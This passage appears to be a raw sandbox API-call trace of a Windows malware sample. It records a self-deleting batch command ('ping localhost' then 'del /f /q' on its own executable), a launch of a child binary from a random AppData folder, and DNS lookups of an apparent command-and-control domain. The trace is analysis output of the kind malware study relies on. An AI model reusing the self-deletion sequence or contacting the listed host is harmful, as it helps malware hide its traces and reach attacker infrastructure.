\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x144fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\ndel /f /q 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0096.640] WriteFile (in: hFile=0xe8, lpBuffer=0x144fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x144fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0096.641] CloseHandle (hObject=0xe8) returned 1 [0096.642] GetCurrentThreadId () returned 0xae8 [0096.642] GetCurrentThreadId () returned 0xae8 [0096.642] GetCurrentThreadId () returned 0xae8 [0096.642] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xb88, dwThreadId=0xb8c)) returned 1 [0096.705] CloseHandle (hObject=0xec) returned 1 [0096.705] CloseHandle (hObject=0xe8) returned 1 [0096.705] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] 
GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] WSACleanup () returned 0 [0096.947] FreeLibrary (hLibModule=0x77380000) returned 1 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentProcess () returned 0xffffffff [0096.947] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0096.947] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] ResetEvent (hEvent=0x88) returned 1 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] 
GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] ResetEvent (hEvent=0x88) returned 1 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] CloseHandle (hObject=0x88) returned 1 [0096.947] CloseHandle (hObject=0x8c) returned 1 [0096.947] CloseHandle (hObject=0x84) returned 1 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.947] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.947] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, 
wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, 
wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime 
(in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.949] VirtualFree (lpAddress=0x13c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.950] FreeLibrary (hLibModule=0x76910000) returned 1 [0096.950] LocalFree (hMem=0x274448) returned 0x0 [0096.950] FreeLibrary (hLibModule=0x76910000) returned 1 [0096.950] LocalFree (hMem=0x274438) returned 0x0 [0096.950] ExitProcess (uExitCode=0x0) Thread: id = 10 os_tid = 0xaf8 [0093.866] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.866] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x14b8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0093.866] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x14f1ffc, cbMultiByte=27, lpWideCharStr=0x19eed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0094.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0094.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x14aa714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0094.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x14b867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0094.534] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x19efb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19efbac | out: ppResult=0x19efbac*=0x0) returned 11001 
[0096.298] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x19efb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19efbac | out: ppResult=0x19efbac*=0x0) returned 11001 [0096.402] getnameinfo (in: pSockaddr=0x19efc14, SockaddrLength=0x0, pNodeBuffer=0x140831c, NodeBufferSize=0x401, pServiceBuffer=0x14d5124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0096.402] htons (hostshort=0x0) returned 0x0 [0096.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0096.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] SetEvent (hEvent=0x84) returned 1 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] GetCurrentThreadId () returned 0xaf8 [0096.402] CloseHandle (hObject=0xb8) returned 1 [0096.402] RtlExitUserThread (Status=0x0) Thread: id = 17 os_tid = 0xb64 Process: id = "9" image_name = "xey8d7zi.exe" filename = "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe" page_root = "0x7ea16700" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges 
= "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xacc" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 566 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 567 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 568 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 569 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 570 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = 